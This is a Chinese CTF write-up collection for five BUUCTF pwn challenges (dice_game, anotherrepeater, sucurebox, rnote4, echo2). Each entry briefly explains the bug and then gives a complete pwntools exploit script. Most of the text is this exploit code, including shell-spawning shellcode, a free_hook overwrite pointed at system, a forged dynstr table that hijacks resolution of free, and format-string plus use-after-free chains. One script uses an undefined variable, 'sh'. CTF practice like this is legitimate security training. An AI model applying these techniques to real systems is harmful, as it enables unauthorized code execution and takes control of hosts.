236 qctf_2018_dice_game
逻辑也是比较的简单。
有个随机数,在栈上,有个栈溢出,答对五十次就可以了。
但是我们可以直接覆盖种子
种子也覆盖成0.这样我们就可以知道第一个数是多少了。
溢出一下就可以了。
exp
#-*- coding:utf-8 -*-
from pwn import*
from ctypes import*
context.log_level="debug"
r=remote("node4.buuoj.cn","27598")
lib = cdll.LoadLibrary('libc.so.6')
r.recvuntil("name:")
payload='A' * 0x40 + p64(0)
payload=payload.ljust(0x50,"C")
r.sendline(payload)
for i in range(50):
r.sendlineafter("point(1~6): ",str(lib.rand() % 6 + 1))
r.interactive()
237 actf_2019_anotherrepeater
有栈溢出,保护啥的也都没开,ret2shellcode就好了。
exp
from pwn import *
r = remote("node4.buuoj.cn",26228)
r.recv()
r.sendline(str(-10))
buf=int(r.recv(8),16)
r.recv()
payload=asm(shellcraft.sh()).ljust(0x41b+0x4,'A')+p32(buf)
r.sendline(payload)
r.interactive()
238 hfctf_2020_sucurebox
然后,我们用IDA分析一下,在add功能里,size的判断不准确,导致size可以很大,使得malloc(size)返回0,但是没有检查malloc的返回值。
edit功能里可以指定offset和len,这样,我们就能在整个内存里进行读写了。
exp
from pwn import*
r = process("./239")
libc = ELF("./libc.so.6")
def add(size):
r.sendlineafter('5.Exit','1')
r.sendlineafter('Size:',str(size))
r.recvuntil('Key:')
r.recvuntil('\n')
strs = sh.recvuntil('\n',drop = True).strip().split(' ')
data = []
for x in strs:
if x == '':
continue
data.append(int(x,16))
return data
def delete(index):
r.sendlineafter('5.Exit','2')
r.sendlineafter('Box ID:',str(index))
def enc(index,off,len,msg):
r.sendlineafter('5.Exit','3')
r.sendlineafter('Box ID:',str(index))
r.sendlineafter('Offset of msg:',str(off))
r.sendlineafter('Len of msg:',str(len))
r.sendafter('Msg:',msg)
def show(index,off,len):
r.sendlineafter('5.Exit','4')
r.sendlineafter('Box ID:',str(index))
r.sendlineafter('Offset of msg:',str(off))
r.sendlineafter('Len of msg:',str(len))
def tranLong(data):
if data & 0x8000000000000000 != 0:
return data - 0x10000000000000000
else:
return data
for i in range(8):
add(0x200)
for i in range(1,8):
delete(i)
delete(0)
key = add(0x200) #0
data = '/bin/sh\x00'
ans = ''
for i in range(8):
ans += p8(ord(data[i]) ^ key[i])
enc(0,0,0x8,ans)
for i in range(7):
add(0x200)
show(7,0x8,0x8)
r.recvuntil('Msg:')
r.recvuntil('\n')
malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
print "libc_base = " + hex(libc_base)
key = add(tranLong(0xFFFFFFFF00000FFF))
data = p64(system_addr)
ans = ''
for i in range(8):
ans += p8(ord(data[i]) ^ key[i])
enc(8,tranLong(free_hook),8,ans)
#getshell
delete(0)
r.interactive()
239 rctf2018_rnote4
PIE没开,RELRO没开。
三个功能,一点字没有。
功能1
看得出来是add。
功能2
是edit,长度自由控制,溢出了。
free
free 指针清空掉了。
问题的关键在于,一点输出没有。
针对这种问题,以往的无论是攻击IO_FILE啊啥的做法就都失效了。
我们注意到RELRO是没有开启的,那么LOAD段是可以修改的。
那么其dt_strtab是可以修改的。
这个dt_strtab是干嘛的。我们回忆一下ret2dl。
图是别的地方偷的,我们找到.dynstr。
它可以直接影响我们最后找到的函数,那么比如我们要找free,最后查表得函数名得时候正来了个system,那不就相当于劫持了free函数嘛……
然后就有了。
exp参考了hav1k大佬。
#coding:utf8
from pwn import *
r = remote('node4.buuoj.cn',25926)
elf = ELF('./239')
free_got = elf.got['free']
free_got_ld = 0x400626
fake_dynstr_addr = 0x6020D0 + 0x100
fake_dynstr = '\x00'*0x5F + 'system\x00'
fake_dynstr = fake_dynstr.ljust(0x73,'\x00')
fake_dynstr += 'GLIBC_2.4\x00GLIBC_2.2.5\x00'
dt_strtab = 0x601EB0
def add(size,content):
r.send("1")
r.send(str(size))
r.send(content)
def edit(index,size,content):
r.send("2")
r.send(str(index))
r.send(str(size))
r.send(content)
def delete(index):
r.send("3")
r.send(str(index))
add(0x20,'a'*0x20) #0
add(0x80,'b'*0x80) #1
add(0x20,'/bin/sh\x00'.ljust(0x20,'\x00')) #2
payload = 'a'*0x20 + p64(0) + p64(0x21) + p64(0x80) + p64(fake_dynstr_addr)
edit(0,0x40,payload)
#伪造dynstr
edit(1,len(fake_dynstr),fake_dynstr)
payload = 'a'*0x20 + p64(0) + p64(0x21) + p64(0x80) + p64(dt_strtab)
edit(0,0x40,payload)
#修改dynstr指针
edit(1,0x8,p64(fake_dynstr_addr))
payload = 'a'*0x20 + p64(0) + p64(0x21) + p64(0x80) + p64(free_got)
edit(0,0x40,payload)
#修改dynstr指针
edit(1,0x8,p64(free_got_ld))
delete(2)
r.interactive()
240 pwnable_echo2
先是一堆初始化。
echo2是一个格式化字符串
echo3是一个uaf。
向v7变量覆盖shellcode,使用prinf的漏洞leak处栈地址然后计算处v6的地址,之后利用uaf漏洞跳转到v6执行。
exp
from pwn import *
r = process("./240")
shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
r.recvuntil(' : ')
r.sendline(shellcode)
r.recvuntil('> ')
r.sendline('2')
r.recvuntil('\n')
r.sendline('%10$016lx') # get rbp addr
rbp_addr = int(r.recv(16),16)
v6_addr = rbp_addr-0x20
r.recvuntil('> ')
r.sendline('4')
r.recvuntil('(y/n)')
r.sendline('n\n3\n'+'a'*24+p64(v6_addr))
r.recvuntil('> ')
r.sendline('3')
r.interactive()